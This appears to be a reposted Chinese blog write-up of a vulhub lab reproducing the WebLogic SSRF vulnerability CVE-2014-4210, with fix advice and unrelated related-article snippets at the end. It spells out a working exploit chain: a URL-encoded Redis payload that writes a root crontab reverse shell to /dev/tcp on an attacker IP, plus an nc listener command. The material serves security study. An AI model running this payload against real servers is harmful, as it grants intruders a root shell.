漏洞复现CVE-2014-4210(Weblogic ssrf)

news/2024/11/30 4:56:34/

最近在打vulhub的靶场记录一下,我是小菜鸡一个,不对的地方还请指教。废话不多说开始。

原因:

ip:7001/uddiexplorer/SearchPublicRegistries.jsp传参时未做过滤导致ssrf漏洞产生,导致可以对内网的服务进行扫描&攻击。

影响版本:

weblogic 10.0.2–10.3.6版本

验证过程:

1.使用nmap进行扫描,得到服务类型和端口号,对目标进行weblogic扫描,发现存在ssrf 漏洞。

2.手工进行验证,使用burp进行抓包,修改operator参数为http://127.0.0.1:7001如果开启本机开启7001端口则会返回404,输入不存在的端口则会返回:but could not connect over HTTP to server,输入一个存在的端口并且不是http协议的则会返回: which did not have a valid SOAP content-type

3.通过爆破内网地址及常用端口得到,内网中存在redis服务端口(6379),并且存在未授权漏洞,可以利用redis反弹shell。

4.以下内容使用url编码进行,将ip端口修改为自己的

testset 1 "\n* * * * * root bash -i >& /dev/tcp/192.168.88.107/9999 0>&1\n"
config set dir /etc/
config set dbfilename crontab
saveqwesanx

5.拼接进数据包中,并且使用nc开启监听(nc -lvvp 9999),稍等一会就可以得到反弹 的shell。

6.可以使用GET方式进行利用,效果一样

http://192.168.88.108:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:7001&rdoSearch=name&txtSearchname=123&txtSearchkey=123&txtSearchfor=123&selfor=Business+location&btnSubmit=Search

http://192.168.88.108:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.20.0.2:6379/test%0a%0aset%201%20%22%5cn%2a%20%2a%20%2a%20%2a%20%2a%20root%20bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192%2e168%2e88%2e107%2f9999%200%3E%261%5cn%22%0aconfig%20set%20dir%20%2fetc%2f%0aconfig%20set%20dbfilename%20crontab%0asave%0a%0aqwesanx%20&rdoSearch=name&txtSearchname=123&txtSearchkey=123&txtSearchfor=123&selfor=Business+location&btnSubmit=Search

修复方式:

1.在不影响业务的情况下,删除server/lib/uddiexplorer.war下的相应jsp文件。 

#> jar -xvf uddiexplorer.war

#> rm jsp-files

#> jar -cvfM uddiexplorer.war uddiexplorer/

2.配置访问权限,取消对外开放

3.升级高版本。

关注公众号Sanx白帽子 发送 ssrf 获取对应的利用工具


http://www.ppmy.cn/news/194759.html

相关文章

Weblogic SSRF漏洞(CVE-2014-4210)

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 关于SSRF漏洞我们就不讲了,传送门——> SSRF(服务端请求伪造)漏洞 今天我们讲的是Weblogic存在的SSRF漏洞。 该漏洞存在于&#xf…

Weblogic SSRF 漏洞(CVE-2014-4210)分析

Weblogic SSRF 漏洞是一个比较经典的 SSRF 漏洞案例,该漏洞存在于 http://127.0.0.1:7001/uddiexplorer/SearchPublicRegistries. jsp 页面中,如图 1 -1 所示 图 1-1 Weblogic SSRF 漏洞 Weblogic SSRF 漏洞可以通过向服务端发送以下请求参数进行触发…

Weblogic SSRF(CVE-2014-4210)漏洞复现

1.漏洞描述 Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 2.漏洞等级 高危 3.影响版本 weblogic 10.0.2 – 10.3.6版本 4.准备工具 VMware环境 vulhub 的weblogic漏洞环境 kali:192.168.…

Weblogic-SSRF【CVE-2014-4210】

文章目录 weblogic-SSRF [CVE-2014-4210]漏洞介绍影响范围漏洞复现1.漏洞发现2. 内网主机存活探测3.SSRF攻击内网rides weblogic-SSRF [CVE-2014-4210] 漏洞介绍 Weblogic 中存在一个 SSRF 漏洞,利用该漏洞可以发送任意HTTP请求,进而可以攻击内网中 Red…

自行车出口欧盟CE认证,新版自行车标准ISO 4210:2023与ISO 8098:2023发布

2023年1月,国际标准化组织ISO发布了新版“自行车以及儿童自行车的测试标准”,即ISO 4210:2023以及ISO 8098:2023,用于取代了SO 4210:2015以及ISO 8098:2015。新版标准一经发布,立即生效。 欧盟标准化委员会…

恒流恒压线性充电芯片MST4210

MST4210是一款恒流恒压线性充电芯片。 此芯片采用恒流/恒压充电模式对锂电池进行充电。 最大充电电流可达1.1A,此芯片耐压可达28V,过压保护电压为6.8V或10.5V。 充电电流和截止电流(EOC)可通过外接电阻调节。 当电池电压低于2…

[后端基础]git的使用,docker的基本使用

许久没写相关内容了,这段时间都在忙乱七八糟的事情......结果什么成果都没有........唉... 实习也寄了,就看看能否进组了 简单的git应用,因为设备用的是linux操作系统,所以这里就先不提供windows的下载方式了 docker也整理在这里了,这俩都是常用的后端技术 1.git的基本布置…

西门子PLC 1200和V20变频器USS通讯 5台西门子变频器V20和1200PLC USS通讯

西门子PLC 1200和V20变频器USS通讯 5台西门子变频器V20和1200PLC USS通讯,西门子触摸屏,总线通讯,实际项目程序,提供,CAD电气图纸 变频器设置说明 详细注释和项目文件 YID:386638070728207